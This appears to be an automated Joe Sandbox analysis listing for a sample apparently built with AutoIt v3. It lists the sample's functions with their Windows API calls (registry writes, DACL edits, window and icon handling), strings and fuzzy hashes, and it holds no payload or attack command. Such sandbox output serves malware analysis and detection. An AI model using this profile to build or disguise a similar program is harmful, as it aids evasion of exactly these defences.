                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 1103490817-719923060
                                      • Opcode ID: 58b949e32a33e96c1df218c034c6583654650d793ed2ff882c8e9cac80b69b92
                                      • Instruction ID: 21373f920c6474923607f1c42b464113a425ce3960d7d58db7170d43d7a2c23e
                                      • Opcode Fuzzy Hash: 58b949e32a33e96c1df218c034c6583654650d793ed2ff882c8e9cac80b69b92
                                      • Instruction Fuzzy Hash: ABE1D2312092118FCB14DF25D59083ABBE5FF9A318B10496EF8969B3E2DB34ED45CB81
                                      Function 004A8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004A8968
                                      • GetSystemMetrics.USER32(00000007), ref: 004A8970
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004A899B
                                      • GetSystemMetrics.USER32(00000008), ref: 004A89A3
                                      • GetSystemMetrics.USER32(00000004), ref: 004A89C8
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004A89E5
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004A89F5
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004A8A28
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004A8A3C
                                      • GetClientRect.USER32(00000000,000000FF), ref: 004A8A5A
                                      • GetStockObject.GDI32(00000011), ref: 004A8A76
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 004A8A81
                                        • Part of subcall function 004A912D: GetCursorPos.USER32(?), ref: 004A9141
                                        • Part of subcall function 004A912D: ScreenToClient.USER32(00000000,?), ref: 004A915E
                                        • Part of subcall function 004A912D: GetAsyncKeyState.USER32(00000001), ref: 004A9183
                                        • Part of subcall function 004A912D: GetAsyncKeyState.USER32(00000002), ref: 004A919D
                                      • SetTimer.USER32(00000000,00000000,00000028,004A90FC), ref: 004A8AA8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: d7ea039fb33011b4cfac162ebe267c56e6a3016d617893f96aeacbe1ccda274f
                                      • Instruction ID: e42aaac2573d95ba85576eb81c18f9ff8425d94ce83cf8bdf831c6b12a1e86d3
                                      • Opcode Fuzzy Hash: d7ea039fb33011b4cfac162ebe267c56e6a3016d617893f96aeacbe1ccda274f
                                      • Instruction Fuzzy Hash: CDB1AA71A002099FDB14DFA8CC45BAE3BB4FB69315F15422AFA05E7290CB78E801CB59
                                      Function 004F0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004F1114
                                        • Part of subcall function 004F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1120
                                        • Part of subcall function 004F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F112F
                                        • Part of subcall function 004F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1136
                                        • Part of subcall function 004F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004F114D
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F0DF5
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004F0E29
                                      • GetLengthSid.ADVAPI32(?), ref: 004F0E40
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 004F0E7A
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F0E96
                                      • GetLengthSid.ADVAPI32(?), ref: 004F0EAD
                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004F0EB5
                                      • HeapAlloc.KERNEL32(00000000), ref: 004F0EBC
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004F0EDD
                                      • CopySid.ADVAPI32(00000000), ref: 004F0EE4
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004F0F13
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F0F35
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F0F47
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0F6E
                                      • HeapFree.KERNEL32(00000000), ref: 004F0F75
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0F7E
                                      • HeapFree.KERNEL32(00000000), ref: 004F0F85
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0F8E
                                      • HeapFree.KERNEL32(00000000), ref: 004F0F95
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004F0FA1
                                      • HeapFree.KERNEL32(00000000), ref: 004F0FA8
                                        • Part of subcall function 004F1193: GetProcessHeap.KERNEL32(00000008,004F0BB1,?,00000000,?,004F0BB1,?), ref: 004F11A1
                                        • Part of subcall function 004F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004F0BB1,?), ref: 004F11A8
                                        • Part of subcall function 004F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004F0BB1,?), ref: 004F11B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 4175595110-0
                                      • Opcode ID: 75ee9354b9eb549d74c23ed96a4fdba8cab980e70e7194bf2a9728d0afe97c1f
                                      • Instruction ID: 87f9b9f283594372848c2398978bdf0871328c3b8cfd06a6bad3f617581949d8
                                      • Opcode Fuzzy Hash: 75ee9354b9eb549d74c23ed96a4fdba8cab980e70e7194bf2a9728d0afe97c1f
                                      • Instruction Fuzzy Hash: 81717D7190020AEBDB209FA4DC49FBFBBB8BF55300F044116FA19A6292D774D90ACB64
                                      Function 0051C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051C4BD
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0052CC08,00000000,?,00000000,?,?), ref: 0051C544
                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0051C5A4
                                      • _wcslen.LIBCMT ref: 0051C5F4
                                      • _wcslen.LIBCMT ref: 0051C66F
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0051C6B2
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0051C7C1
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0051C84D
                                      • RegCloseKey.ADVAPI32(?), ref: 0051C881
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0051C88E
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0051C960
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 9721498-966354055
                                      • Opcode ID: f2a3f3d9962a535f846afd85329e7c2d401af568f8a95342a2ca19e1aba78bf7
                                      • Instruction ID: f73f5ba08e3b13d3f6c21467944b50676bceff7caf06b0b0dc64f6abd5bfc8cf
                                      • Opcode Fuzzy Hash: f2a3f3d9962a535f846afd85329e7c2d401af568f8a95342a2ca19e1aba78bf7
                                      • Instruction Fuzzy Hash: 88126B35208201AFDB14DF15C481E6ABBE5FF88758F05886DF84A9B3A2DB35ED41CB85
                                      Function 0052091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 005209C6
                                      • _wcslen.LIBCMT ref: 00520A01
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00520A54
                                      • _wcslen.LIBCMT ref: 00520A8A
                                      • _wcslen.LIBCMT ref: 00520B06
                                      • _wcslen.LIBCMT ref: 00520B81
                                        • Part of subcall function 004AF9F2: _wcslen.LIBCMT ref: 004AF9FD
                                        • Part of subcall function 004F2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004F2BFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 1103490817-4258414348
                                      • Opcode ID: d6e099364d0f3c492a68b345fb3b0945d6f6a96b99d7d186c942a74dd07ef582
                                      • Instruction ID: 6e6f24eb000bc197dd16140e0228aee58ea288a06651298424772ff43853a921
                                      • Opcode Fuzzy Hash: d6e099364d0f3c492a68b345fb3b0945d6f6a96b99d7d186c942a74dd07ef582
                                      • Instruction Fuzzy Hash: CAE1BC312093118FCB14DF25D49092ABBE1BF9A318F54895EF8969B3E2D734ED49CB81
                                      Function 0051C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 1256254125-909552448
                                      • Opcode ID: 9228d23978c2a1247a0777684ff76ef5b1f334551a447250257217bbce332597
                                      • Instruction ID: 3c513d405835be0e1549d607c3bdbdc27fdbb2ac950fea5841764e1c35206923
                                      • Opcode Fuzzy Hash: 9228d23978c2a1247a0777684ff76ef5b1f334551a447250257217bbce332597
                                      • Instruction Fuzzy Hash: 8B71123268412A8BEB20DE7C98515FF3F95BFA5758F240529FC6697284E636CDC4C3A0
                                      Function 0052833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 0052835A
                                      • _wcslen.LIBCMT ref: 0052836E
                                      • _wcslen.LIBCMT ref: 00528391
                                      • _wcslen.LIBCMT ref: 005283B4
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005283F2
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00525BF2), ref: 0052844E
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00528487
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005284CA
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00528501
                                      • FreeLibrary.KERNEL32(?), ref: 0052850D
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0052851D
                                      • DestroyIcon.USER32(?,?,?,?,?,00525BF2), ref: 0052852C
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00528549
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00528555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 799131459-1154884017
                                      • Opcode ID: 669105dabe88ba6f0a4e56e8acdf7e7a5b457bede01e9ec3c3f8e8b01a2e698a
                                      • Instruction ID: 76e1e743809070fd9c72f750cec89ba1041fb1a9e3691dadec648eb5c57cdcba
                                      • Opcode Fuzzy Hash: 669105dabe88ba6f0a4e56e8acdf7e7a5b457bede01e9ec3c3f8e8b01a2e698a
                                      • Instruction Fuzzy Hash: B2610171600225BBEF24DFA4DC81BFE7BA8BF19725F10450AF815D61D1DB74A980D7A0
                                      Function 00497778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 0-1645009161
                                      • Opcode ID: 8488e8dbb279ea4717aafb47b78e3391e7ef02dda4b817c749e2536aba330b44
                                      • Instruction ID: d9f70338414bb84cfd1af811c8575c880e3cf7e57f9a11dfcbf0d25d23a539fd
                                      • Opcode Fuzzy Hash: 8488e8dbb279ea4717aafb47b78e3391e7ef02dda4b817c749e2536aba330b44
                                      • Instruction Fuzzy Hash: 8681F871A10205ABDF10AF61DC52FAF3F69BF15304F04407BF805AA292EB78D905C7A9
                                      Function 004F5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 004F5A2E
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004F5A40
                                      • SetWindowTextW.USER32(?,?), ref: 004F5A57
                                      • GetDlgItem.USER32(?,000003EA), ref: 004F5A6C
                                      • SetWindowTextW.USER32(00000000,?), ref: 004F5A72
                                      • GetDlgItem.USER32(?,000003E9), ref: 004F5A82
                                      • SetWindowTextW.USER32(00000000,?), ref: 004F5A88
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004F5AA9
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004F5AC3
                                      • GetWindowRect.USER32(?,?), ref: 004F5ACC
                                      • _wcslen.LIBCMT ref: 004F5B33
                                      • SetWindowTextW.USER32(?,?), ref: 004F5B6F
                                      • GetDesktopWindow.USER32 ref: 004F5B75
                                      • GetWindowRect.USER32(00000000), ref: 004F5B7C
                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004F5BD3
                                      • GetClientRect.USER32(?,?), ref: 004F5BE0
                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 004F5C05
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004F5C2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                      • String ID:
                                      • API String ID: 895679908-0
                                      • Opcode ID: a827129d2d6426d1561eece404f747df02a68672a6565e03475ed157827629d7
                                      • Instruction ID: 1d1343d92b12dcc3d478e075a8294ccdc7cfdc3387f79a2f12fbdf051ef037bd
                                      • Opcode Fuzzy Hash: a827129d2d6426d1561eece404f747df02a68672a6565e03475ed157827629d7
                                      • Instruction Fuzzy Hash: 7D717D31900B09AFDB20DFA8CE85AAEBBF5FF48704F104519E642A26A0D778F945DB54
                                      Function 004F30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[U
                                      • API String ID: 176396367-4215271941
                                      • Opcode ID: 69d6d0098121cee4d006df61bdcdf22c843a76b8cf1331aa0562bd00918af4ed
                                      • Instruction ID: 11e9dc3b7588a56ec5b2995fbddb18ee26a38abecb125fa9525884e249320445
                                      • Opcode Fuzzy Hash: 69d6d0098121cee4d006df61bdcdf22c843a76b8cf1331aa0562bd00918af4ed
                                      • Instruction Fuzzy Hash: 85E10831A0051AABCB14DFB4C4516FEBBB0BF54715F14812BEA56F7340DB38AE8987A4
                                      Function 004B00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004B00C6
                                        • Part of subcall function 004B00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0056070C,00000FA0,A69424E5,?,?,?,?,004D23B3,000000FF), ref: 004B011C
                                        • Part of subcall function 004B00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004D23B3,000000FF), ref: 004B0127
                                        • Part of subcall function 004B00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004D23B3,000000FF), ref: 004B0138
                                        • Part of subcall function 004B00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004B014E
                                        • Part of subcall function 004B00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004B015C
                                        • Part of subcall function 004B00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004B016A
                                        • Part of subcall function 004B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004B0195
                                        • Part of subcall function 004B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004B01A0
                                      • ___scrt_fastfail.LIBCMT ref: 004B00E7
                                        • Part of subcall function 004B00A3: __onexit.LIBCMT ref: 004B00A9
                                      Strings
                                      • WakeAllConditionVariable, xrefs: 004B0162
                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 004B0122
                                      • InitializeConditionVariable, xrefs: 004B0148
                                      • SleepConditionVariableCS, xrefs: 004B0154
                                      • kernel32.dll, xrefs: 004B0133
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 66158676-1714406822
                                      • Opcode ID: 0deed138afa08ddff5b688b2b1183fdb525dbb4e3fa30f7476409a0a45e03519
                                      • Instruction ID: 95956f2e8b8f69e4cb0c0e48b3e25abaaaa2e79f00d0b2a530fc22590a628fd7
